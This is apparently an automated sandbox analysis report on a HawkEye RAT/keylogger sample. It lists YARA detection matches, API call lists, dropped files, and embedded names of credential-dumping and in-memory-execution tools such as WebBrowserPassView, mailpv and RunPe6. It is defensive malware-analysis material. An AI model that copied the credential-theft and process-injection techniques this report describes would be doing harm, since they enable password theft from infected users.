Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
.NET source code contains very large array initializations
Source: 1.2.FukQGQj7cl.exe.a70000.0.unpack, As4x/Af5k.cs | Large array initialization: .cctor: array initializer size 2392
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Users\user\Desktop\FukQGQj7cl.exe | Code function: 1_2_00A76BED
Source: C:\Users\user\Desktop\FukQGQj7cl.exe | Code function: 1_2_012EC8F8
Source: C:\Users\user\Desktop\FukQGQj7cl.exe | Code function: 1_2_012E7428
Source: C:\Users\user\Desktop\FukQGQj7cl.exe | Code function: 1_2_012EF7C0
Source: C:\Users\user\Desktop\FukQGQj7cl.exe | Code function: 1_2_012EBC10
Source: C:\Users\user\Desktop\FukQGQj7cl.exe | Code function: 1_2_012EDFD8
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 16_2_00D620B0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 16_2_02E4B29C
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 16_2_02E4C310
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 16_2_02E499D0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Code function: 16_2_02E4DFD0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_00404F4E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00404419
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00404516
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00413538
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_004145A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_0040E639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_004337AF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_004399B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_0043DAE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00405CF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00403F85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00411F99
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00411538 appears 35 times
Source: FukQGQj7cl.exe | Binary or memory string: OriginalFilename vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.331167441.0000000006D20000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSHCore1.dll0 vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.307395644.0000000000B8D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTRCoManagementSystem.exeD vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.330769051.0000000006BE0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPe6.dll" vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.330413840.0000000006910000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInstallUtil.exeT vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe, 00000001.00000002.309200167.000000000130A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe | Binary or memory string: OriginalFilenameTRCoManagementSystem.exeD vs FukQGQj7cl.exe
Source: FukQGQj7cl.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 16.2.InstallUtil.exe.8460000.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.InstallUtil.exe.84c0000.12.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.InstallUtil.exe.30bea60.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.501112721.0000000008460000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FukQGQj7cl.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile created: C:\Users\user\AppData\Local\Temp\InstallUtil.exeJump to behavior
                  Source: FukQGQj7cl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
